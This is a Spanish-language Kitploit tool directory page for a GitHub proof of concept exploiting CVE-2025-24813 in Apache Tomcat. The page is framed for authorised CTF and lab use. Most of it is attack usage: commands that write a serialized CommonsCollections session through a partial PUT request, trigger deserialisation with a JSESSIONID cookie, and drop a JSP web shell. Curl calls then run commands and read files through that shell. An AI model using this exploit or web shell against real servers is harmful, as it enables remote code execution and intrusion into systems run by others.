Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-24813 — payload correcto para CVE de Java | Kitploit
Herramientas/GitHubGitHub/loufa0/cve-2025-24813
Escáneres de VulnerabilidadesExplotaciónSeguridad WebCTFAprendizaje y EducaciónLabs y Práctica
GitHubloufa0/cve-2025-24813

CVE-2025-24813

payload correcto para CVE de Java

Ver Repositorio
hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-24813 Tomcat PoC

PoC para un entorno CTF/laboratorio autorizado. Explota CVE-2025-24813 mediante la escritura PUT parcial de un archivo de sesión de Tomcat, y luego desencadena la deserialización con JSESSIONID.

Requisitos previos

  • Python 3
  • Módulo Python requests
  • Java JDK (java y javac)
  • El archivo incluido commons-collections-3.2.1.jar, colocado en esta carpeta

ysoserial no es necesario.

Archivos

  • poc_cve_2025_24813.py: wrapper de Python que automatiza generación, subida y activación.
  • GenerateTomcatSessionPayload.java: genera una sesión de Tomcat válida que contiene un gadget CommonsCollections.
  • commons-collections-3.2.1.jar: dependencia del gadget.
  • sh.jsp: JSP shell opcional desplegado con --drop-shell.

Uso

Depositar un JSP shell en el webroot por defecto /opt/tomcat/webapps/ROOT:

root@kitploit:~
./poc_cve_2025_24813.py http://TARGET:8080 \
  --session-id poc24813 \
  --drop-shell \
  --shell-name sh.jsp

Ejecutar un comando directo sin depositar un shell:

root@kitploit:~
./poc_cve_2025_24813.py http://TARGET:8080 \
  --session-id cmd24813 \
  --cmd 'id > /opt/tomcat/webapps/ROOT/rce.txt'

Si el webroot es diferente:

root@kitploit:~
./poc_cve_2025_24813.py http://TARGET:8080 \
  --drop-shell \
  --webroot /path/to/webroot \
  --shell-name sh.jsp

Si el JAR se ha movido, indicar su ruta:

root@kitploit:~
./poc_cve_2025_24813.py http://TARGET:8080 \
  --jar /path/to/commons-collections-3.2.1.jar \
  --drop-shell

Después de la explotación

Si --drop-shell tiene éxito:

root@kitploit:~
curl --get --data-urlencode 'cmd=id' http://TARGET:8080/sh.jsp
curl --get --data-urlencode 'cmd=cat /opt/tomcat/user.flg' http://TARGET:8080/sh.jsp

Condiciones en el lado del objetivo

  • Versión de Tomcat vulnerable.
  • DefaultServlet escribible, típicamente readonly=false.
  • Soporte de PUT parcial.
  • Sesiones persistentes mediante PersistentManager y FileStore.
  • Cadena de gadgets disponible en el servidor, aquí commons-collections.

El comportamiento esperado durante la subida suele ser HTTP 409 Conflict en:

root@kitploit:~
PUT /<session-id>/session
Content-Range: bytes 0-1000/1200

Luego la deserialización se desencadena con:

root@kitploit:~
Cookie: JSESSIONID=.<session-id>
Descargar herramienta